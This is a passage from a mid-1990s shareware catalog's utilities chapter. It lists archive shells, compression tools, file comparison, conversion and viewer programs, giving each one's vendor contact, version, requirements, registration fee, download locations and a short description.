ACZAW300.ZIP on BBSs (call 915-595-8705 to download it + at no charge); ACZAW3.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 2 (or contact userID 71031,3614 for assistance). + SWREG#: 2107 + Download size: 1200k (about 89 minutes with a 2400 baud modem) + Description: + Beats WinZip by far!!! Built-in ZIP and UNZIP comp. with + v2.04g, built-in multi-volume! Supports ZIP,ARJ,LZH,PAK, + ARC,ZOO,SQZ,HYP,ARCE,all SFX, McAfee's SCAN,DIET,PKLITE,LZEXE, + Drag & Drop,3-d interface, Backup/Restore entire drives or + directories using multi-volume ZIP or ARJ, view archives within + archives unlimited levels deep, and much more... + + Chapter 2, "Utilities" 48 + + + + Product: ARCHIVE TRACKER + Author: Robert Barrentine Consulting, 301-490-7104 + Version: 1.0 (12-20-93) + Needs: IBM PC, DOS 3.0 or better. 275k RAM; Hard disk. + Registration fee: $35.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited tollfree 800# phone, fax, CompuServe, mail + support; 3-month return policy; discounts on upgrades. 1 free + update disk(s) sent out. + Look for: ACTR10.ZIP on BBSs; ACTR10.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 6 (or contact userID 100014,2347 for + assistance). + Download size: 271k (about 20 minutes with a 2400 baud modem) + Description: + Consists of a recommended file archiving system and the + implementing software that keeps track of the archived computer + files. Software reads archive directories and stores file data + in database that can be searched to locate specified files. + + + Product: Crush + Author: PocketWare, +44-81-203-3731 + Version: v1.3 (11-05-94) + Needs: IBM PC, DOS 2.0 or better. 80k RAM. + Registration fee: $29.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: CRUSH.ZIP on BBSs; CRUSH.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 5 (or contact userID 100031,3537 for + assistance); CRUSH.ZIP on GEnie in IBMPC forum LIBrary 0. + SWREG#: 2870 + PsL#: 11363 + Download size: 66k (about five minutes with a 2400 baud modem) + Description: + Super-compressor for DOS. Fed up with limited compression + performance of Stacker, PKZIP (2.04g), UC2, ZOO, ARJ and LHA? + This will usually give 5%-50% improved compression over any + other DOS compression tool, & yet allows the user to continue + using the archiver already in use. Fast & the ideal choice for + users keen to save disk space. Too good to be true? No! Try it! + PocketD v4.1 compatible. + + + Product: Directory Freedom + Compact file manager and application launcher. See full + description on page 9. + + Chapter 2, "Utilities" 49 + + + + Product: Drag And Zip + Author: Canyon Software, 415-382-7999 + Version: 2.41 (06-22-93) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor. + PKZIP/PKUNZIP. + Strongly recommended: VGA monitor; Hard disk. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; DRAGZP.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 74774,554 + for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Makes any file manager that supports Drag and Drop into a Zip + file manager. Drag files to a zipper icon and run PKZIP on + them. Double click on a Zip file in file manager and a window + with the Zip file listing pops up. Tag files for extraction or + deletion. Run the associated program on a file. View the file + with the built in ASCII viewer. Drag and drop directories. + Fileman Launcher installs into File Manager and runs DZ with + it. When you quit file manager, DZ automatically quits too. + + + Product: File Maven + DOS file manager and file transfer utility. See full + description on page 192. + + Product: INFOMANIA + Indexes text files/finds offline text quickly. See full + description on page 13. + + Product: JRchive + Author: JAYAR Systems, 416-751-5678 + Version: 1.02 (11-01-93) + Needs: IBM PC, DOS 2.1 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Registration fee: $29.00 (add $5.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited phone, mail support; + royalty-free runtime license; bonus utilities; all ASP-wide + offers (see page 6). + Look for: JRC102.ZIP on BBSs (call 519-940-0007 to download it at + no charge). + Download size: 86k (about seven minutes with a 2400 baud modem) + Description: + Compresses files and stores them in an archive file. It has a + "concatenated archive" option that puts the files in the + archive first, then compresses it for better compression + ratios. Archives and the file extraction program may be + + Chapter 2, "Utilities" 50 + + + + distribute without royalty and you may also create royalty-free + self-extracting archives. + + + Product: PMZIP + Author: Nico Mak Computing, Inc. + Version: 1.00 (01-14-91) + Needs: IBM AT (80286), OS/2 1.0 or better. PKZIP/PKUNZIP. + Registration fee: $29.00 + Registration benefits: 31/2" master disk(s); 3 months of + CompuServe, mail support; disks of other shareware. + Look for: availability unknown on BBSs; PMZIP.ZIP on CompuServe + in CIS:IBMOS2 forum LIBrary 1 (or contact userID 70056,241 for + assistance). + Download size: 70k (about five minutes with a 2400 baud modem) + Description: + An OS/2 Presentation Manager ZIP shell featuring + v/ Point and click SAA/CUA compliant interface for adding, + deleting, extracting, and viewing members of a ZIP file + v/ Multi-selection list box with the names, sizes, and date/ + time stamps of files in a ZIP file (double-click on a file + to view it) + v/ Extensive online hypertext help/documentation + v/ Easy installation + v/ All options can be saved and restored + v/ Support for File Manager Drag and Drop interface + + + Product: PocketD Plus + Award-winning 220+ option DOS army knife. See full description + on page 193. + + Product: PUT, GET, Install Utilities + Author: MicroFox Company, 216-659-9489 + Version: 3.43 (05-05-95) + Needs: IBM PC, DOS 2.0 or better. 192k RAM. + Strongly recommended: Hard disk; Mouse. + Registration fee: $19.00 (add $2.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + 1-month limited return policy; LAN license; site license; bonus + utilities; all ASP-wide offers (see page 6); disks of other + + Chapter 2, "Utilities" 51 + + + + shareware; discounts on other products. 1-month free upgrading + allowed. + Look for: PUT343.ZIP on BBSs (call 216-661-9065 to download it at + no charge); PUT343.ZIP on CompuServe in CIS:PCUTIL forum + LIBrary 1 (or contact userID 73057,3113 for assistance); + PUT343.ZIP on GEnie in IBMPC forum LIBrary 0. + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Utilites for compressing/decompressing and archiving/ + unarchiving files. Also for creating your own program + installing utility for your software packages. + + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 194. + + Product: QuickDir + DOS and archive shell. Custom directory tree. See full + description on page 11. + + Product: Rosenthal WinLite + Author: Rosenthal Engineering, 805-541-0910 + Version: 1.0 (10-24-93) + Needs: IBM AT (80286), Windows 3.1 or better. 256k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive. + Strongly recommended: Hard disk. + Registration fee: $149.00 + Registration benefits: 31/2" master disk(s); 3 months of unlimited + phone, fax, CompuServe, GEnie, mail support; site license; all + ASP-wide offers (see page 6). + Look for: WINLITE1.ZIP on BBSs (multiple files) (call + 805-528-6172 to download it at no charge). + Download size: 242k (about 18 minutes with a 2400 baud modem) + Description: + Compress MS-Windows programs to dramatically reduce their size. + Programs compressed are functionally identical to the + originals, only smaller. For example, consider the 180k + "Solitaire" game that is bundled with MS-Windows 3.1. You can + compress it to less than 77k, or 43% of its original size. The + smaller, more efficient programs save disk space, LAN overhead, + disk caching resources and discourage reverse engineering. + + Chapter 2, "Utilities" 52 + + + + Product: RPF Zip Control + Author: RPF Software + Version: 2.1.5 (12-03-94) + Needs: IBM 80386, OS/2 2.1 or better. VGA monitor. OS/2 ZIP/ + UNZIP utilities. + Strongly recommended: Mouse. + Registration fee: $35.00 + Registration benefits: 3 months of unlimited fax, CompuServe, + mail support; all ASP-wide offers (see page 6). 12-month free + upgrading allowed. + Look for: ZIPCT215.ZIP on BBSs (call 703.385.4325 to download it + at no charge); ZIPCTL.ZIP on CompuServe in CIS:OS2SHARE forum + LIBrary 1 (or contact userID 71660,535 for assistance). + SWREG#: 1373 + Download size: 373k (about 28 minutes with a 2400 baud modem) + Description: + An easy-to-use 32bit PM program which shields the user from the + command line when using the OS/2 freeware ZIP.EXE & UNZIP.EXE + utilities. Users have a "point and click" view of the contents + of .ZIP files and can create new .ZIP files. + + + Product: Safe Program + Lock files in a software safe - Email secure. See full + description on page 45. + + Product: Shez + Author: California Software Design, 707-575-9868 + Version: 9.5 (10-29-93) + Needs: IBM PC, DOS 3.0 or better. 400k RAM; CGA monitor; Hard + disk; Mouse. One or more compression programs: ZIP, LHA, ARJ, + ZOO, SQZ, or PAK. + Strongly recommended: HP LaserJet printer; XMS memory. + Registration fee: $39.00 + Registration benefits: quick-reference card; 3 months of BBS, + CompuServe, GEnie, mail support; bonus utilities; all ASP-wide + offers (see page 6). + Look for: SHEZ95.ZIP on BBSs (call 714-636-2662 to download it at + no charge); SHEZ95.ZI on CompuServe in CIS:IBMSYS forum LIBrary + 6 (or contact userID 76266,2634 for assistance); SHEZ95.ZIP on + GEnie in IBMPC forum LIBrary 0 (or contact userID J.DERR1 for + assistance). + SWREG#: 270 + Download size: 260k (about 20 minutes with a 2400 baud modem) + Description: + A program shell designed to make working with compressed files + a much eaiser task. Can handle ZIP, ARC, ZOO, LZH, PAK, SQZ, + AND ARJ compressed files. The user can use drop down menus to + manage their compressed files, or built in hotkeys can be used + for the more advanced user. Provides built-in context + sensitive help for all functions, and provides a common + interface to all of the supported compressed file formats. You + can view, create, modify, convert, virus-check, and much more. + Mouse support. + + Chapter 2, "Utilities" 53 + + + + Product: SQWEZ + Author: JM Software, 609-423-1989 + Version: 1.0 (04-16-94) + Needs: IBM AT (80286), DOS 3.0 or better. 640k RAM; Program can + run safely on a system with no hard disk and only one floppy + disk drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $25.00 (add $1.50 for shipping to U.S. + addresses) (add $1.50 for shipping to Canadian addresses) (add + $2.50 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited CompuServe, mail support; 3-month return + policy; all ASP-wide offers (see page 6). Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; SQWZ1.EXE on CompuServe + in CIS:IBMAPP forum LIBrary 7 (or contact userID 74131,1704 for + assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + An easy to use multi-file compression package that outputs a + self expanding program. File overwrite and CRC data checks are + used to help assure quality data compression and decompression. + Ideal for software authors to package their program files for + distribution. + + + Product: Stowaway True Archival System + Archive seldom used/inactive files to disks. See full + description on page 24. + + Product: Universal Install + Software installation development kit. See full description on + page 489. + + Product: ViDir/ViRes File Monitor System + Monitor file usage; eliminate unused files. See full + description on page 14. + + Chapter 2, "Utilities" 54 + + + + Product: WinZip + Author: Nico Mak Computing, Inc. + Version: 5.0 (11-08-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Strongly recommended: PKZIP/PKUNZIP, ARJ, LHA, and a virus + scanning program. + Registration fee: $29.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + CompuServe, mail support; 1-month return policy; discounts on + upgrades. 6-month free upgrading allowed. 1 free update + disk(s) sent out. + Look for: WINZIP*.ZIP on BBSs (call 703-680-9269 to download it + at no charge); WINZIP.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 6 (or contact userID 70056,241 for assistance). + SWREG#: 402 + Download size: 199k (about 15 minutes with a 2400 baud modem) + Awards & nominations: 1994 winner, Shareware Industry Awards. + Description: + Bring the convenience of Windows to ZIP, ARJ, and LZH files + with an easy-to-use point-and-click interface. Features built- + in PKZIP-compatible ZIP and UNZIP, full drag and drop support, + and extensive help. View, run, extract, add, and virus scan + files in archives. + "Repeatedly Charms You" - Windows Magazine, 12/92 + "Must-have Shareware Treasure" - Compute, 10/92 + "Powerful Yet Intuitive" - PC World, 8/92 + "WinApp of the Month" - PC Computing, 3/92 + + + Product: XMENU + Small, fast shell for LHA, PKZIP, ARJ, etc. See full + description on page 201. + + Product: Zip Pro + Author: Synaptek Software, 905-276-8835 + Version: 1,0 (11-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. 2000k RAM; CGA + monitor; XMS memory. + Strongly recommended: VGA monitor; Hard disk; Mouse; Network + (LAN). + Registration fee: $29.95 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; all ASP-wide offers (see page 6); + + Chapter 2, "Utilities" 55 + + + + discounts on upgrades. 6-month free upgrading allowed. 1 free + update disk(s) sent out. + Look for: ZP_ARC10.ZIP on BBSs; ZP_ARC.EXE on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 74167,722 for + assistance). + Download size: 350k (about 26 minutes with a 2400 baud modem) + Description: + With built-in Zip/UnZip, encryption, multivolume, drive windows + with tree and file views, Zip lists, Zip views and unique + interface features to simplify and animate Drag & Drop. PKZIP + not required. Fully PKZIP 2.04g compatible. Not just a shell, + this application brings real Zip functionallity to Windows and + makes it visual and simple to use. The Drag Bubble make Drag & + Drop a truly intuitive experience. + + + Product: Zip Server(TM) + Author: Redei Enterprises, 310-832-6984 + Version: 1.3 (04-13-95) + Needs: IBM 80386, Windows 3.1 or better. Hard disk; + VBRUN300.DLL. + Strongly recommended: SVGA monitor; Mouse; XMS memory; math + coprocessor. + Registration fee: $39.50 (add $5.50 for shipping to U.S. + addresses) (add $5.50 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; all + ASP-wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs. + Download size: 794k (about 59 minutes with a 2400 baud modem) + Description: + A tool for creating, updating, viewing and extracting PKZIP + 2.04g compatible archives by loading ZS as a visible + application or using it remotely and invisibly from another + Windows application. Multi volume archives. Sample code for + using with Visual Basic and with MSWord 6.0 + + Chapter 2, "Utilities" 56 + + + + Product: ZiPaper + Author: Daniel Thomas, 714-524-5625 + Version: 1.3c (12-30-91) + Needs: IBM PC, Windows 3.0 or better. 1024k RAM; EGA monitor; + Hercules monitor; Hard disk. PKZip/PKUnzip or LHArc. + Registration fee: $15.00 (add $3.00 for shipping to U.S. + addresses) (add $3.00 for shipping to Canadian addresses) (add + $6.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); lifetime unlimited BBS, CompuServe, mail + support; bonus graphics; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; ZIPAPR.ZIP on CompuServe + in CIS:WINFUN forum LIBrary 10 (or contact userID 72301,2164 + for assistance). + Download size: 50k (about four minutes with a 2400 baud modem) + Description: + Randomly selects .BMP files for wallpaper each time you run + Windows. Keep the .BMP files in one ZIP or LHArc file. Save + disk space! Supports tile/center and more. Support for multiple + ZIP files, manual selection of BMP file, LHArc and more. + + + 2.2.4 File comparison + + Product: DIFF + Author: C.Sitte Softwaretechnik + Version: 1.21 (10-15-94) + Needs: IBM PC, DOS 3.0 or better. + Registration fee: $15.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); 6 + months of CompuServe, mail support; 1-month return policy; all + ASP-wide offers (see page 6); disks of other shareware. + Look for: DIFF121.ZIP on BBSs; CSDIFF.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 6 (or contact userID 73030,1070 for + assistance). + Download size: 45k (about four minutes with a 2400 baud modem) + Description: + Displays the differences between two text files or between two + directories or ZIP archives. The two text files (or + directories) are displayed side by side. Common and different + sections are clearly marked with separator lines. Especially + useful for programmers who wants to see the differences between + two versions of a source text file or to show the differences + between two sets of files, where one or both sets can reside in + a ZIP archive. Various formatting and comparison options are + available. + + + Product: FootPrint + File tracking: daily, softwre install, audit. See full + description on page 19. + + Chapter 2, "Utilities" 57 + + + + Product: PMFLCOMP + Author: American Coders, LTD., 919-846-2014 + Version: 1.61 (05-30-95) + Needs: IBM 80386, OS/2 2.0 or better. 4000k RAM; Hard disk. + Strongly recommended: CGA monitor; Hercules monitor. + Registration fee: $45.00 (add $5.00 for shipping to U.S. + addresses) (add $10.00 for shipping to Canadian addresses) (add + $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of phone, CompuServe, mail support; 1-month return + policy; all ASP-wide offers (see page 6); disks of other + shareware. 3-month free upgrading allowed. 2 free update + disk(s) sent out. + Look for: PMFLCOMP.ZIP on BBSs; FLCOMP.ZIP on CompuServe in + CIS:OS2USER forum LIBrary 4 (or contact userID 74150,2370 for + assistance). + SWREG#: 1918 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Compares two files using three different methods: + 1. Ascii/line: compares two files on a line by line basis. + An excellent tool for comparing differences in source + programs. + 2. Hex/binary: compares two files on a byte by byte basis. A + comprehensive listing to compare right down to the bit + level. + 3. Checksum: comparees two files by calculating a checksum + value for both files. The fastest way to compare two + files. Provides options to customize the comparison type. + + + Product: Reconcile + Author: Shareable Software International, 708-397-1221 + Version: 1.30 (05-18-93) + Needs: IBM PC, Windows 3.0 or better. 640k RAM; EGA monitor. + Registration fee: $24.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, mail support; + lifetime return policy; bonus utilities; all ASP-wide offers + (see page 6); disks of other shareware; discounts on other + products. Bonus DOS version. + Look for: WINREC13.ZIP on BBSs (call 215-623-6203 to download it + at no charge); WINREC.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 2 (or contact userID 76226,2652 for assistance). + Download size: 200k (about 15 minutes with a 2400 baud modem) + Description: + Selectively updates two directories both ways. Up to 20 include + and exclude file masks. Script files. Supports remote drives + created with Interlink, Brooklyn Bridge, etc. Invaluable for + users of portables or offices with no network. Compares all the + files in a pair of directories and marks wach file for + exclusion, update or copying, according to what you have told + + Chapter 2, "Utilities" 58 + + + + it to do. It copies files backwards and forwards until both + directories contain the most up-to-date version of every file + needing update. + + + Product: SHERLOCK + Author: Gulf Sierra, 301-460-0354 + Version: 2.73 (12-28-93) + Needs: IBM PC, DOS 2.1 or better. + Registration fee: $25.00 + Registration benefits: Master disks, phone/mail support. Bonus + utilities. Shareware disks of other programs. + Look for: SHERL273.ZIP on BBSs (call 202-547-2008 to download it + at no charge); SRL273.ZIP on CompuServe in CIS:IBMSYS forum + LIBrary 1 (or contact userID 73270,77 for assistance). + Download size: 121k (about nine minutes with a 2400 baud modem) + Description: + A text comparison utility, compares two ASCII files line by + line. Displays five lines from each file in separate windows. + You may scroll either or both files passed the mismatch to put + them in sync and continue. Either file can be automatically + scanned to locate a line matching the line selected in the + other file. Contains features for searching, ignoring case, + spaces, tabs, jumping around the files and copying lines to a + printer. This is a tool for programmers and writers. + + + Product: STF: Show Two FIles + Author: R.P.McCormick + Version: 1.45 (09-21-93) + Needs: IBM PC, DOS 3.0 or better. Program can run safely on a + system with no hard disk and only one floppy disk drive. + Strongly recommended: VGA monitor. + Registration fee: $10.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $13.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited BBS, mail support; 1-month limited return + policy; bonus utilities; disks of other shareware. + Look for: STF***.ZIP on BBSs (call DELPHI-&-AOL to download it at + no charge); STF***.ZIP on GEnie in IBMPC forum LIBrary 5. + Download size: 62k (about five minutes with a 2400 baud modem) + Description: + Select filenames from a directory list. Use PageUp & Down, + Home, End & Arrow keys to move around each file independently + or together. Differences are "highlighted" by dimming unequal + lines in one file. Optionally ignores spaces in comparison. A + single file may be viewed full width. Searches for and + highlights found text. Sliding centerline varies the relative + viewing width of each file. Optional VGA graphics mode. Chosen + to be included in "DOS 6.0 Power Tools" by Bantam Books. + + Chapter 2, "Utilities" 59 + + + + Product: WDiff + Author: C.Sitte Softwaretechnik + Version: 1.30 (05-29-95) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $20.00 (add $5.00 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 6 months of CompuServe, mail support; 1-month + return policy; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware. + Look for: WDIFF130.ZIP on BBSs; WDIFF.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 73030,1070 for + assistance). + SWREG#: 1772 + PsL#: 11663 + Download size: 75k (about six minutes with a 2400 baud modem) + Description: + Displays the differences between two text files or between two + directories or ZIP archives. The two text files (or + directories) are displayed side by side. Different sections are + marked with separator lines and different colors. Especially + useful to see the differences between two versions of a text + file or to show the differences between two sets of files, + where one or both sets can reside in a ZIP archive. Various + formatting and comparison options. + + + Product: Windev - Windows Developer + Editor/programmer's tools for Windows 3.1. See full + description on page 495. + + Product: Windev - Windows NT Developer + Editor/programmer's tools for Windows NT. See full description + on page 496. + + 2.2.5 File sorting & conversion + + See also: Writing applications, Writing utilities, File format + translators; Spreadsheet applications, Spreadsheet utilities, + File format translators; Database applications, Database + utilities, File format translators; Communications, + Communication utilities, File format translators; Graphics, + Utilities, Cataloging tools. + + Product: ACZAR for DOS + Powerful archive/compression shell for DOS. See full + description on page 46. + + Product: ACZAR for Windows [***] + Windows archive/compression shell. See full description on + page 47. + + Chapter 2, "Utilities" 60 + + + + Product: Bigsort + General purpose data sorting utility. See full description on + page 291. + + Product: dPerfect Merge + Author: Newdorf Research, 619-793-8300 + Version: 2.0 (05-16-95) + Needs: IBM PC, DOS 2.11 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive. + Registration fee: $26.00 (add $3.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $5.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + fax, CompuServe, mail support; 3-month limited return policy; + bonus utilities; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; DPERF.ZIP on CompuServe + in CIS:WPUSERS forum LIBrary 21 (or contact userID 73170,216 + for assistance). + SWREG#: 3319 + PsL#: 10595 + Download size: 229k (about 17 minutes with a 2400 baud modem) + Description: + Converts xBase compatible data (dBase III/IV/5, Fox, Clipper, + etc.) to Word Perfect (4.2-6.x) secondary files for mail merge + applications. Features record and field selection, and record + sorting. Allows American/European date format. Converts + European characters. Single- or multi-user. Prints summary + sheets and creates setup files to automate the conversion. + Includes data base browser, memo-field conversion and support + for latest versions of dBase and Word Perfect. + + + Product: Extract It + Author: TeraByte Unlimited + Version: 1.00 (07-14-95) + Needs: IBM PC, DOS 3.0 or better. 512k RAM. + Strongly recommended: Hard disk. + Registration fee: $17.95 (add $4.00 for shipping to Canadian + addresses) (add $5.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, fax, CompuServe, mail support; + discounts on upgrades. 1-month free upgrading allowed. + Look for: availability unknown on BBSs; EXTRIT.ZIP on CompuServe + in CIS:PCUTIL forum LIBrary 6 (or contact userID 70751,3507 for + assistance). + SWREG#: 6606 + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + A DOS-based data report extractor utility. It enables you to + extract and export selected fields from an ASCII report file to + a standard ASCII delimited file. This file can be imported to + + Chapter 2, "Utilities" 61 + + + + just about any database or spreadsheet application. An + incredible value! + + + 2.2.6 File viewers + + See also: Writing applications. + + Product: 4EDIT + File description editor for 4DOS. See full description on + page 219. + + Product: ACZAR for DOS + Powerful archive/compression shell for DOS. See full + description on page 46. + + Product: ACZAR for Windows [***] + Windows archive/compression shell. See full description on + page 47. + + Product: DEXTER Text Editor + Premium quality multi-file text editor. See full description + on page 225. + + Product: DIFF + File/Directory/ZIP difference utility. See full description on + page 56. + + Product: Drag And View + Author: Canyon Software, 415-382-7999 + Version: 2.0 (07-12-93) + Needs: IBM AT (80286), Windows 3.1 or better. EGA monitor; Hard + disk. Any file manager that supports drag and drop. + Strongly recommended: VGA monitor. + Registration fee: $25.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support. 1-month return policy. 1-month free upgrading + allowed. + Look for: availability unknown on BBSs; DRAGVU.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 74774,554 + for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Awards & nominations: 1993 winner, Shareware Industry Awards. + Description: + Lets users view files in their native formats. You use it by + dragging files from Win file manager to DV's icon. It will + open up a window displaying the first file in the group in its + native format. Users can look at other files in the group by + choosing their name from the "Filelist" menu. Multiple window + viewing. Search, Goto. Formats supported: ASCII, Hex, Word, Win + Word, Write, WordPerfect, Ami Pro, xBase, Excel, Quattro, + Lotus, Paradox, BMP, ICO, PCX, GIF, TIF, ZIP, LZH. + + Chapter 2, "Utilities" 62 + + + + Product: EDDY (EDit DirectorY) + Do ANYTHING(!) you want with files/DIRs/disks. See full + description on page 17. + + Product: EMERI + Reads your Windows Cardfiles from DOS! See full description on + page 292. + + Product: HexEdit + Author: Al Funk + Version: 1.51 (12-01-92) + Needs: IBM PC, Windows 3.0 or better. + Registration fee: $10.00 + Registration benefits: Support, free updates. + Look for: HEXEDT15.ZIP on BBSs; HEXEDT.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 2 (or contact userID 71505,1277 for + assistance). + Download size: 100k (about eight minutes with a 2400 baud modem) + Description: + A hexadecimal file editor/viewer with a built-in oct/dec/hex + calculator. Includes search, character distribution viewer. + + + Product: INFOMANIA + Indexes text files/finds offline text quickly. See full + description on page 13. + + Product: Inspect & Install for Windows + Setup utilities for Windows/Windows NT. See full description + on page 487. + + Product: Katelin Comment Manager + Author: Katelin, Inc., 217-662-6780 + Version: 1.20 (09-26-94) + Needs: IBM 80386, Windows 3.1 or better. VGA monitor; Hard disk; + VBRUN300.DLL. + Strongly recommended: Mouse; Epson printer. + Registration fee: $22.00 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $11.25 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); 3 months of phone, fax, CompuServe, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades; + registration commissions. 12-month free upgrading allowed. 1 + free update disk(s) sent out. + Look for: availability unknown on BBSs; COMMAN.EXE on CompuServe + in CIS:IBMSYS forum LIBrary 6 (or contact userID 76530,350 for + assistance). + Download size: 767k (about 57 minutes with a 2400 baud modem) + Description: + Lets the user attach narrative to your files in your own words. + Comments can be cut and pasted between files. Files can be + copied, moved, renamed, and duplicated while comments remain + + Chapter 2, "Utilities" 63 + + + + intact. Seach for comments in files, search for files and text + in files. Launch your favorite programs without opening + Program Manager. View text and graphic (WMF, GIF, PCX, BMP, + ICO, TGA) files, also print/copy graphic files. Complete + directory maintenance functions. + + + Product: MultiVu + Author: Ivden Technologies, Inc., 610-328-1145 + Version: 1.1 (03-17-95) + Needs: IBM AT (80286), Windows 3.0 or better. CGA monitor; + Hercules monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $19.00 (add $4.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; bonus utilities; all ASP- + wide offers (see page 6). 1 free update disk(s) sent out. + Look for: MULTVU11.ZIP on BBSs (call 215-322-5114 to download it + at no charge); MULTVU.ZIP on CompuServe in CIS:WINSHARE forum + LIBrary 1 (or contact userID 71221,3602 for assistance). + SWREG#: 2993 + PsL#: 11408 + Download size: 107k (about eight minutes with a 2400 baud modem) + Description: + A Windows utility for viewing files up to 2 GB. Scans your + disk for text or files. Searches for text lightning fast. Keep + up to 20 files open. Drag'n'Drop support. File preload for + smooth scrolling. Background operation: load, search, print + while browsing or using other programs. Maintain bookmarks in + each open file. Separately control screen and printer fonts. + Supports multiple concurrent users on a LAN. Now, multi-select + files, select text color, browse archive (zip, arj, lzh) files. + + + Product: PMFLCOMP + ASCII/hex/checksum file compare for OS/2. See full description + on page 56. + + Product: PopDBF + 4k TSR for "instant access to X-Base files" See full + description on page 294. + + Chapter 2, "Utilities" 64 + + + + Product: QRead + Author: DS Products, 508-250-1351 + Version: 2.0 (03-23-95) + Needs: IBM 80386, Windows 3.1 or better. Program can run safely + on a system with no hard disk and only one floppy disk drive; + EGA monitor; Hercules monitor. + Strongly recommended: Hard disk. + Registration fee: $23.00 (add $3.00 for shipping to Canadian + addresses) (add $3.00 for shipping outside U.S. or Canada) + Registration benefits: 31/2" master disk(s); lifetime CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6); discounts on other products; discounts on upgrades. + Look for: QREAD.ZIP on BBSs; QREAD.ZIP on CompuServe in + CIS:IBMSYS forum LIBrary 6 (or contact userID 70731,1673 for + assistance). + SWREG#: 5341 + Download size: 259k (about 19 minutes with a 2400 baud modem) + Description: + Lets you read text files quickly and easily in the Windows + environment. Automatically adjusts the font size or the line + structure to fit the window. Helps you keep track of your + 